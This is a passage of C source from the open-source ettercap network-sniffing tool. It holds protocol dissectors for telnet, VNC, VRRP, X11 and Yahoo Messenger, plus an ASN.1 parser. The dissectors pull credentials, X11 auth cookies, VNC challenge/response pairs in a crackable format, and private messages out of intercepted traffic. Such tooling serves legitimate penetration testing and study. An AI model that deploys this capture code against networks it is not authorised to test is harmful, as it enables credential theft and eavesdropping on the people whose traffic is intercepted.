} } } } /* delete the ident */ SAFE_FREE(ident); /* check if it is the first readable packet sent by the server */ IF_FIRST_PACKET_FROM_SERVER_SSL("telnet", "telnets", s, ident, dissector_telnet) { size_t i; u_char *q; DEBUG_MSG("\tdissector_telnet BANNER"); /* get the banner */ SAFE_CALLOC(PACKET->DISSECTOR.banner, PACKET->DATA.len + 1, sizeof(char)); if ( end > ptr && (u_int32)(end - ptr) <= PACKET->DATA.len) /* Paranoid check */ memcpy(PACKET->DISSECTOR.banner, ptr, end - ptr ); q = (u_char*)PACKET->DISSECTOR.banner; for (i = 0; i < PACKET->DATA.len; i++) { /* replace \r\n with spaces */ if (q[i] == '\r' || q[i] == '\n') q[i] = ' '; /* replace command with end of string */ if (q[i] == 0xff) q[i] = '\0'; } /* XXX - ugly hack !! * it is for servers that send a "\r\0\r\n" before the banner (BSDI) * returning here, means that we don't erase the SYN+ACK session * so the next packet will fall here again. */ if (strlen(PACKET->DISSECTOR.banner) < 5) { SAFE_FREE(PACKET->DISSECTOR.banner); SAFE_FREE(ident); return NULL; } /* * some OS (e.g. windows and ipso) send the "login:" in the * same packet as the banner... */ if (match_login_regex((const char*)ptr)) { DEBUG_MSG("\tdissector_telnet - BEGIN"); /* create the session to begin the collection */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_telnet)); /* use this value to remember to not collect the banner again */ s->data = "\xe7\x7e"; session_put(s); return NULL; } } ENDIF_FIRST_PACKET_FROM_SERVER(s, ident); return NULL; } /* * move the pointer ptr while it is a telnet command. */ static void skip_telnet_command(u_char **ptr, u_char *end) { while(**ptr == 0xff && *ptr < end) { /* sub option 0xff 0xfa ... ... 0xff 0xf0 */ if (*(*ptr + 1) == 0xfa) { *ptr += 1; /* search the sub-option end (0xff 0xf0) */ do { *ptr += 1; } while(**ptr != 0xff && *ptr < end); /* skip the sub-option end */ *ptr += 2; } else { /* normal option 0xff 0xXX 0xXX */ *ptr += 3; } } } /* * convert 0x00 char into spaces (0x20) so we can * use str*() functions on the buffer... */ static void convert_zeros(u_char *ptr, u_char *end) { /* * walk the entire buffer, but skip the last * char, if it is 0x00 it is actually the string * terminator */ while(ptr < end - 1) { if (*ptr == 0x00) { DEBUG_MSG("\tdissector_telnet ZERO converted"); /* convert the char to a space */ *ptr = ' '; } ptr++; } } /* * serach the strings which can identify failed login... * return 1 on succes, 0 on failure */ static int match_login_regex(const char *ptr) { char *words[] = {"incorrect", "failed", "failure", NULL }; int i = 0; /* * "login:" is a special case, we have to take care * of messages from the server, they can contain login: * even if it is not the login prompt */ if ((strcasestr(ptr, "login:") || strcasestr(ptr, "username:") ) && !strcasestr(ptr, "last") && !strcasestr(ptr, "from")) return 1; /* search for keywords */ do { if (strcasestr(ptr, words[i])) return 1; } while (words[++i] != NULL); return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_vnc.c000664 000000 000000 00000024510 13711276346 020036 0ustar00rootroot000000 000000 /* ettercap -- dissector VNC -- TCP 5900 5901 5902 5903 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct vnc_status { u_char status; u_char challenge[16]; u_char response[16]; u_char banner[16]; }; #define WAIT_AUTH 1 #define WAIT_CHALLENGE 2 #define WAIT_RESPONSE 3 #define WAIT_RESULT 4 #define NO_AUTH 5 #define LOGIN_OK 6 #define LOGIN_FAILED 7 #define LOGIN_TOOMANY 8 /* protos */ FUNC_DECODER(dissector_vnc); void vnc_init(void); /************************************************/ static char itoa16[16] = "0123456789abcdef"; static inline void hex_encode(unsigned char *str, int len, unsigned char *out) { int i; for (i = 0; i < len; ++i) { out[0] = itoa16[str[i]>>4]; out[1] = itoa16[str[i]&0xF]; out += 2; } } /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init vnc_init(void) { dissect_add("vnc", APP_LAYER_TCP, 5900, dissector_vnc); dissect_add("vnc", APP_LAYER_TCP, 5901, dissector_vnc); dissect_add("vnc", APP_LAYER_TCP, 5902, dissector_vnc); dissect_add("vnc", APP_LAYER_TCP, 5903, dissector_vnc); } FUNC_DECODER(dissector_vnc) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; struct vnc_status *conn_status; /* don't complain about unused var */ (void) DECODE_DATALEN; (void) DECODED_LEN; /* Packets coming from the server */ if (FROM_SERVER("vnc", PACKET)) { /* Interesting packets have len >= 4 */ if (PACKET->DATA.len < 4) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_vnc)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { /* This is the first packet from the server (protocol version) */ if (!strncmp((const char*)ptr, "RFB ", 4)) { DEBUG_MSG("\tdissector_vnc BANNER"); /* Catch the banner that is like "RFB xxx.yyy" */ PACKET->DISSECTOR.banner = strdup((const char*)ptr); /* remove the \n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\n')) != NULL ) *ptr = '\0'; /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_vnc)); /* remember the state (used later) */ SAFE_CALLOC(s->data, 1, sizeof(struct vnc_status)); conn_status = (struct vnc_status *) s->data; conn_status->status = WAIT_AUTH; strncpy((char*)conn_status->banner, PACKET->DISSECTOR.banner, 16); /* save the session */ session_put(s); } } else { /* The session exists */ conn_status = (struct vnc_status *) s->data; /* If we are waiting for auth scheme by the server */ if (conn_status->status == WAIT_AUTH) { /* Authentication scheme requested by the server: * 0 - Connection Failed * 1 - No Authentication * 2 - VNC Authentication */ DEBUG_MSG("\tDissector_vnc AUTH"); /* No authentication required!!! */ if (!memcmp(ptr, "\x00\x00\x00\x01", 4)) { /* * Free authentication will be notified on * next client's packet */ if(!strstr((const char*)conn_status->banner, "008")) { /* TightVNC hack */ conn_status->status = NO_AUTH; } } else if (!memcmp(ptr, "\x00\x00\x00\x00", 4)) { /* Connection Failed */ if(!strstr((const char*)conn_status->banner, "008")) { /* TightVNC hack */ /*...so destroy the session*/ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_vnc)); SAFE_FREE(ident); return NULL; } } else if (!memcmp(ptr, "\x00\x00\x00\x02", 4)) { /* VNC Auth required */ /* Skip Authentication type code (if the challenge is in the same packet) */ ptr+=4; /* ...and waits for the challenge */ conn_status->status = WAIT_CHALLENGE; } else { /* search for challenge packet */ char buffer[17]; if(PACKET->DATA.len >= 16) { memcpy(buffer, ptr, 16); buf[16] = 0; if(!strstr(buffer, "VNCAUTH_") && PACKET->DATA.len == 16) { /* Saves the server challenge (16byte) in the session data */ conn_status->status = WAIT_RESPONSE; memcpy(conn_status->challenge, ptr, 16); } } } } /* We are waiting for the server challenge */ if ((conn_status->status == WAIT_CHALLENGE) && (ptr < end)) { char buffer[17]; if(PACKET->DATA.len >= 16) { memcpy(buffer, ptr, 16); buf[16] = 0; /* Saves the server challenge (16byte) in the session data */ if(!strstr(buffer, "VNCAUTH_") && PACKET->DATA.len == 16) { DEBUG_MSG("\tDissector_vnc CHALLENGE"); conn_status->status = WAIT_RESPONSE; memcpy(conn_status->challenge, ptr, 16); } } } else if (conn_status->status == WAIT_RESULT) { /* We are waiting for login result */ /* Login Result * 0 - Ok * 1 - Failed * 2 - Too many attempts */ DEBUG_MSG("\tDissector_vnc RESULT"); if (!memcmp(ptr, "\x00\x00\x00\x00", 4)) conn_status->status = LOGIN_OK; else if (!memcmp(ptr, "\x00\x00\x00\x01", 4)) conn_status->status = LOGIN_FAILED; else if (!memcmp(ptr, "\x00\x00\x00\x02", 4)) conn_status->status = LOGIN_TOOMANY; } } } else { /* Packets coming from the client */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_vnc)); /* Only if we catched the connection from the beginning */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { /* We have to catch even ACKs to dump LOGIN FAILURE information on a client's packet */ conn_status = (struct vnc_status *) s->data; /* If there is no auth! */ if (conn_status->status == NO_AUTH) { DEBUG_MSG("\tDissector_vnc NOAUTH"); PACKET->DISSECTOR.user = strdup("VNC"); PACKET->DISSECTOR.pass = strdup("No Password!!!"); DISSECT_MSG("VNC : %s:%d -> No authentication required\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_vnc)); } else /* If we have catched server result */ if (conn_status->status >= LOGIN_OK) { u_char *str_ptr, index; DEBUG_MSG("\tDissector_vnc DUMP ENCRYPTED"); PACKET->DISSECTOR.user = strdup("VNC"); SAFE_CALLOC(PACKET->DISSECTOR.pass, 256, sizeof(char)); /* Dump Challenge and Response */ snprintf(PACKET->DISSECTOR.pass, 11, "Challenge:"); str_ptr = (u_char*)PACKET->DISSECTOR.pass + strlen(PACKET->DISSECTOR.pass); for (index = 0; index < 16; index++) snprintf((char*)str_ptr + (index * 2), 3, "%.2x", conn_status->challenge[index]); strcat((char*)str_ptr, " Response:"); str_ptr =(u_char*) PACKET->DISSECTOR.pass + strlen(PACKET->DISSECTOR.pass); for (index = 0; index < 16; index++) snprintf((char*)str_ptr + (index * 2), 3, "%.2x", conn_status->response[index]); if (conn_status->status > LOGIN_OK) { PACKET->DISSECTOR.failed = 1; DISSECT_MSG("VNC : %s:%d -> %s (Login Failed)\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.pass); } else { DISSECT_MSG("VNC : %s:%d -> %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.pass); } dissect_wipe_session(PACKET, DISSECT_CODE(dissector_vnc)); } else { /* If we are waiting for client response (don't care ACKs) */ if (conn_status->status == WAIT_RESPONSE && PACKET->DATA.len >= 16) { unsigned char challenge[33]; unsigned char response[33]; hex_encode(conn_status->challenge, 16, challenge); challenge[32] = 0; hex_encode(ptr, 16, response); response[32] = 0; DEBUG_MSG("\tDissector_vnc RESPONSE"); /* Saves the client response (16byte) in the session data */ conn_status->status = WAIT_RESULT; memcpy(conn_status->response, ptr, 16); /* even possibly wrong passwords can be useful */ DISSECT_MSG("%s-%d:$vnc$*%s*%s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), challenge, response); } } } } SAFE_FREE(ident); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_vrrp.c000664 000000 000000 00000010222 13711276346 020234 0ustar00rootroot000000 000000 /* ettercap -- dissector vrrp -- works over IP ! Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * RFC: 2338 * * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * |Version| Type | Virtual Rtr ID| Priority | Count IP Addrs| * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Auth Type | Adver Int | Checksum | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | IP Address (1) | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | . | * | . | * | . | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | IP Address (n) | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Authentication Data (1) | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Authentication Data (2) | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * */ #include #include #include /* globals */ struct vrrp_hdr { u_char ver; /* Version */ u_char id; /* Virtual Router ID */ u_char prio; /* Router Priority */ u_char naddr; /* # of addresses */ u_char auth; /* Type of Authentication */ u_char adv; /* ADVERTISEMENT Interval */ u_short csum; /* Checksum */ }; #define VRRP_AUTH_NONE 0 #define VRRP_AUTH_SIMPLE 1 #define VRRP_AUTH_AH 2 #define VRRP_AUTH_DATA_LEN 8 /* protos */ FUNC_DECODER(dissector_vrrp); void vrrp_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init vrrp_init(void) { dissect_add("vrrp", PROTO_LAYER, NL_TYPE_VRRP, dissector_vrrp); } /* * the passwords collected by vrrp will not be logged * in logfile since it is not over TCP or UDP. * anyway we can print them in the user message window */ FUNC_DECODER(dissector_vrrp) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; struct vrrp_hdr *vhdr; u_char *auth; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets */ if (PACKET->DATA.len < sizeof(struct vrrp_hdr)) return NULL; DEBUG_MSG("VRRP --> dissector_vrrp"); vhdr = (struct vrrp_hdr *)ptr; /* not an authenticated message */ if (ntohs(vhdr->auth) != VRRP_AUTH_SIMPLE) return NULL; /* point to the auth */ auth = ptr + sizeof(struct vrrp_hdr) + (vhdr->naddr * IP_ADDR_LEN); DISSECT_MSG("VRRP : %s:%d -> AUTH: %s \n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), auth); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_x11.c000664 000000 000000 00000017176 13711276346 017673 0ustar00rootroot000000 000000 /* ettercap -- dissector X11 -- TCP 6000, 6001, ..., 6063 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct x11_request { u_int8 endianness; u_int8 unused8; u_int16 major; u_int16 minor; u_int16 name_len; u_int16 data_len; u_int16 unused16; u_int8 name[18]; u_int16 null; u_int8 data[16]; }; /* protos */ FUNC_DECODER(dissector_x11); void x11_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init x11_init(void) { dissect_add("x11", APP_LAYER_TCP, 6000, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6001, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6002, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6003, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6004, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6005, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6006, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6007, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6008, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6009, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6010, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6011, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6012, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6013, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6014, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6015, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6016, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6017, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6018, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6019, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6020, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6021, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6022, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6023, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6024, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6025, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6026, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6027, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6028, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6029, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6030, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6031, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6032, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6033, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6034, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6035, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6036, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6037, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6038, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6039, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6040, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6041, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6042, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6043, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6044, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6045, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6046, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6047, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6048, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6049, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6050, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6051, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6052, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6053, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6054, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6055, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6056, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6057, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6058, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6059, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6060, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6061, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6062, dissector_x11); dissect_add("x11", APP_LAYER_TCP, 6063, dissector_x11); } FUNC_DECODER(dissector_x11) { struct ec_session *s = NULL; void *ident; char tmp[MAX_ASCII_ADDR_LEN]; struct x11_request *x11; int i; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* * check if it is the first packet sent by the server i * after the session is created (cookie already sent) */ IF_FIRST_PACKET_FROM_SERVER("x11", s, ident, dissector_x11) { DEBUG_MSG("\tdissector_x11 BANNER"); /* * get the banner * this parsing is very ugly, but is works (at least for me) * it should be better checked in the header to find the * banner length etc etc... */ PACKET->DISSECTOR.banner = strdup((const char*)PACKET->DATA.disp_data + 40); } ENDIF_FIRST_PACKET_FROM_SERVER(s, ident) /* skip messages coming from the server */ if (FROM_SERVER("x11", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("X11 --> TCP dissector_x11"); x11 = (struct x11_request *)PACKET->DATA.disp_data; /* * can somebody test it under big-endian systems * and tell me what is the right parsing ? */ if (x11->endianness != 0x6c) return NULL; /* not supported other than MIT-MAGIC-COOKIE-1 */ if (x11->name_len != 18 || x11->data_len != 16) return NULL; /* check the magic string */ if (strncmp((const char*)x11->name, "MIT-MAGIC-COOKIE-1", x11->name_len)) return NULL; DEBUG_MSG("\tDissector_x11 COOKIE"); /* fill the structure */ PACKET->DISSECTOR.user = strdup("MIT-MAGIC-COOKIE-1"); /* the cookie's length is 32, take care of the null char */ SAFE_CALLOC(PACKET->DISSECTOR.pass, 33, sizeof(char)); for (i = 0; i < 16; i++) snprintf(PACKET->DISSECTOR.pass + (i * 2), 3, "%.2x", x11->data[i] ); /* * create the session to remember to check the * banner on the next packet sent by server * the check is made by IF_FIRST_PACKET_FROM_SERVER */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_x11)); session_put(s); /* print the message */ DISSECT_MSG("X11 : %s:%d -> XAUTH: %s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_ymsg.c000664 000000 000000 00000012321 13711276346 020224 0ustar00rootroot000000 000000 /* ettercap -- dissector Yahoo Messenger -- TCP 5050 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ /* protos */ FUNC_DECODER(dissector_ymsg); void ymsg_init(void); void decode_pwd(char *pwd, char *outpwd); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ymsg_init(void) { dissect_add("ymsg", APP_LAYER_TCP, 5050, dissector_ymsg); } FUNC_DECODER(dissector_ymsg) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; u_char *q; u_int32 field_len; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* Empty or not a yahoo messenger packet */ if (PACKET->DATA.len == 0 || memcmp(ptr, "YMSG", 4)) return NULL; DEBUG_MSG("ymsg --> TCP dissector_ymsg"); /* standard ymesg separator */ if ( !(ptr = memmem(ptr, PACKET->DATA.len, "\xC0\x80", 2)) ) return NULL; /* Login is ASCII 0 */ if (*(ptr-1) == '0' && FROM_CLIENT("ymsg", PACKET)) { /* Skip the separator and reach the end*/ ptr += 2; for (q=ptr; *q != 0xc0 && q < end; q++); if (q >= end) return NULL; /* Calculate the user len (no int overflow) */ field_len = q - ptr; SAFE_CALLOC(PACKET->DISSECTOR.user, field_len + 1, sizeof(char)); memcpy(PACKET->DISSECTOR.user, ptr, field_len); /* Skip the separator */ ptr = q + 2; if (*ptr != '6') { SAFE_FREE(PACKET->DISSECTOR.user); return NULL; } /* Login is ASCII 6 */ ptr += 3; /* skip the separator and the "6" */ for (q=ptr; *q != 0xc0 && q < end; q++); if (q >= end) { SAFE_FREE(PACKET->DISSECTOR.user); return NULL; } /* Calculate the pass len (no int overflow) */ field_len = q - ptr; SAFE_CALLOC(PACKET->DISSECTOR.pass, field_len + 1, sizeof(char)); memcpy(PACKET->DISSECTOR.pass, ptr, field_len); PACKET->DISSECTOR.info = strdup("The pass is in MD5 format ( _2s43d5f is the salt )"); DISSECT_MSG("YMSG : %s:%d -> USER: %s HASH: %s - %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); } else if (*(ptr-1) == '1') { /* Message is ASCII 1 */ u_char *from=NULL, *to=NULL, *message=NULL, *temp_disp_data; /* Skip the separator and reach the end*/ ptr += 2; for (q=ptr; *q != 0xc0 && q < end; q++); if (q >= end) return NULL; field_len = q - ptr; SAFE_CALLOC(from, field_len + 1, sizeof(char)); memcpy(from, ptr, field_len); /* Skip the two separators and the ASCII 5 */ ptr = q + 5; for (q=ptr; *q != 0xc0 && q < end; q++); if (q >= end) { SAFE_FREE(from); return NULL; } field_len = q - ptr; SAFE_CALLOC(to, field_len + 1, sizeof(char)); memcpy(to, ptr, field_len); /* Skip the two separators and the ASCII 14 */ ptr = q + 6; for (q=ptr; *q != 0xc0 && q < end; q++); if (q >= end) { SAFE_FREE(from); SAFE_FREE(to); return NULL; } field_len = q - ptr; SAFE_CALLOC(message, field_len + 1, sizeof(char)); memcpy(message, ptr, field_len); /* Update disp_data in the packet object (128 byte will be enough for ****YAHOOO.... string */ temp_disp_data = (u_char *)realloc(PACKET->DATA.disp_data, strlen((const char*)from) + strlen((const char*)to) + strlen((const char*)message) + 128); if (temp_disp_data != NULL) { PACKET->DATA.disp_data = temp_disp_data; snprintf((char*)PACKET->DATA.disp_data, strlen((const char*)from) + strlen((const char*)to) + strlen((const char*)message) + 128, "*** Yahoo Message ***\n From: %s\n To: %s\n\n Message: %s\n", from, to, message); PACKET->DATA.disp_len = strlen((const char*)PACKET->DATA.disp_data); } SAFE_FREE(from); SAFE_FREE(to); SAFE_FREE(message); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_asn1.c000664 000000 000000 00000011341 13711276346 015726 0ustar00rootroot000000 000000 /* * ASN.1 DER parsing * Copyright (c) 2006, Jouni Malinen * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * Alternatively, this software may be distributed under the terms of BSD * license. * * See README and COPYING for more details. */ #include #include int asn1_get_next(uint8_t *buf, size_t len, struct asn1_hdr *hdr) { uint8_t *pos, *end; uint8_t tmp; memset(hdr, 0, sizeof(*hdr)); pos = buf; end = buf + len; hdr->identifier = *pos++; hdr->class = hdr->identifier >> 6; hdr->constructed = !!(hdr->identifier & (1 << 5)); if ((hdr->identifier & 0x1f) == 0x1f) { hdr->tag = 0; do { if (pos >= end) { DEBUG_MSG("ASN.1: Identifier " "underflow"); return -1; } tmp = *pos++; DEBUG_MSG("ASN.1: Extended tag data: " "0x%02x", tmp); hdr->tag = (hdr->tag << 7) | (tmp & 0x7f); } while (tmp & 0x80); } else hdr->tag = hdr->identifier & 0x1f; tmp = *pos++; if (tmp & 0x80) { if (tmp == 0xff) { DEBUG_MSG("ASN.1: Reserved length " "value 0xff used"); return -1; } tmp &= 0x7f; /* number of subsequent octets */ hdr->length = 0; if (tmp > 4) { DEBUG_MSG("ASN.1: Too long length field"); return -1; } while (tmp--) { if (pos >= end) { DEBUG_MSG("ASN.1: Length " "underflow"); return -1; } hdr->length = (hdr->length << 8) | *pos++; } } else { /* Short form - length 0..127 in one octet */ hdr->length = tmp; } if (end < pos || hdr->length > (unsigned int)(end - pos)) { DEBUG_MSG("ASN.1: Contents underflow"); return -1; } hdr->payload = pos; return 0; } int asn1_parse_oid(uint8_t *buf, size_t len, struct asn1_oid *oid) { uint8_t *pos, *end; unsigned long val; uint8_t tmp; memset(oid, 0, sizeof(*oid)); pos = buf; end = buf + len; while (pos < end) { val = 0; do { if (pos >= end) return -1; tmp = *pos++; val = (val << 7) | (tmp & 0x7f); } while (tmp & 0x80); if (oid->len >= ASN1_MAX_OID_LEN) { DEBUG_MSG("ASN.1: Too long OID value"); return -1; } if (oid->len == 0) { /* * The first octet encodes the first two object * identifier components in (X*40) + Y formula. * X = 0..2. */ oid->oid[0] = val / 40; if (oid->oid[0] > 2) oid->oid[0] = 2; oid->oid[1] = val - oid->oid[0] * 40; oid->len = 2; } else oid->oid[oid->len++] = val; } return 0; } int asn1_get_oid(uint8_t *buf, size_t len, struct asn1_oid *oid, uint8_t **next) { struct asn1_hdr hdr; if (asn1_get_next(buf, len, &hdr) < 0 || hdr.length == 0) return -1; if (hdr.class != ASN1_CLASS_UNIVERSAL || hdr.tag != ASN1_TAG_OID) { DEBUG_MSG("ASN.1: Expected OID - found class %d " "tag 0x%x", hdr.class, hdr.tag); return -1; } *next = hdr.payload + hdr.length; return asn1_parse_oid(hdr.payload, hdr.length, oid); } void asn1_oid_to_str(struct asn1_oid *oid, char *buf, size_t len) { char *pos = buf; size_t i; int ret; if (len == 0) return; buf[0] = '\0'; for (i = 0; i < oid->len; i++) { ret = snprintf(pos, buf + len - pos, "%s%lu", i == 0 ? "" : ".", oid->oid[i]); if (ret < 0 || ret >= buf + len - pos) break; pos += ret; } buf[len - 1] = '\0'; } static uint8_t rotate_bits(uint8_t octet) { int i; uint8_t res; res = 0; for (i = 0; i < 8; i++) { res <<= 1; if (octet & 1) res |= 1; octet >>= 1; } return res; } unsigned long asn1_bit_string_to_long(uint8_t *buf, size_t len) { unsigned long val = 0; 